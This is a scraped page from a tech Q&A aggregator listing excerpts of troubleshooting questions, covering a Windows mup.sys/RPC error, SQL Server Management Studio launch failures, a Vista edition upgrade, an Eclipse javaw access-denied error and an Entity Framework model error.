    I think that my mup.sys file is corrupted, I received the following error when trying to access a network share that was located on my Windows 7 box, from my Windows xp box: No network provider accepted the given network path. After reading this I attempted to follow the directions by entering my computer into safe mode. After I run "sfc /scannow" I receive the following error message: The specific error code is 0x000006ba [The RPC server is unavailable]. Additionally when I go into Services, it says that the Remote Procedure Call (RPC) service is running but that the Remote Procedure Call (RPC) Locator is not running. When I try to start the Remote Procedure Call (RPC) Locator, it gives me an error saying: Error 1084: This service cannot be started in Safe Mode So what can I do about this exactly? If it can't find the Remote Procedure Call service in safe mode?

    Read the article

  • Cannot find one or more components. Please reinstall application

    - by Chris
    I am running Windows 8, 64 bit and have SQL Server 2012 installed. I downloaded the client tools, looked in the directory for SQL Server Management Studio, and see it's there. When I try to run SQL Management Studio I receive the error message: "Cannot find one or more components. Please reinstall application". This problem just started. I have reinstalled the application and downloaded the service packs. The shortcut key shows the path but it still will not run.

    Read the article

  • Upgrading from Vista Home Basic to Vista Business

    - by miracle2k
    I have a PC that came with Vista Home Basic, and I now have some need for Remote Desktop, which is not included in Home Basic, so I'd like to upgrade. Now, there is apparently some hack to get Remote Desktop working in Home Premium, and obviously, it's in Ultimate, but really, the Business Edition would be the best fit for us. Unfortunately, Windows Anytime Upgrade does not provide a path from Home Basic to Business. My question is, if I were to buy a standalone Vista Business license, could I use it to do an upgrade from my current Home Basic installation? Would it be simply entering the new license key?

    Read the article

  • Eclipse says "Access Denied" when running javaw and how to fix it?

    - by Eduardo de Luna
    I'm trying to get Eclipse to compile and run a HelloWorld class but it can't even do that. I have installed Eclipse x86 SDK 4.2.0 together bit with the latest JRE and JDK both in 64 bit as well. I also have the PATH variables set to respond to command prompts. When I try to run the following code: class HelloWorld { public static void main(String[] args) { System.out.println("Hello World!" ) ; } } And it returns the following error: Exception occurred executing command line. Cannot run program "C:\Program Files\Java\jre7\bin\javaw.exe" (in directory "C:\Users\Default\workspace\devs"): CreateProcess error=5, Access is denied. Can you help me fix this? Thanks!

    Read the article

  • The entity type String is not part of the model for the current context error [migrated]

    - by Michael V
    I am getting the following error in my controller after the view submits the collection: The entity type String is not part of the model for the current context. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.InvalidOperationException: The entity type String is not part of the model for the current context. Source Error: Line 51: foreach (var survey in mysurveys) Line 52: { Line 53: db.Entry(survey).State = EntityState.Modified; Line 54: Line 55: // db.Entry(survey).State = EntityState.Modified; Here is the code ` [HttpPost] public ActionResult UpdateTest(FormCollection mysurveys) { System.Diagnostics.Debug.WriteLine("iam in test post" + mysurveys.Count); foreach (var survey in mysurveys) { db.Entry(survey).State = EntityState.Modified; } db.SaveChanges(); return View(mysurveys); } `Similar code with one record only (no foreach) works fine

    Read the article

< Previous Page | 870 871 872 873 874 875 876 877 878 879 880 881  | Next Page >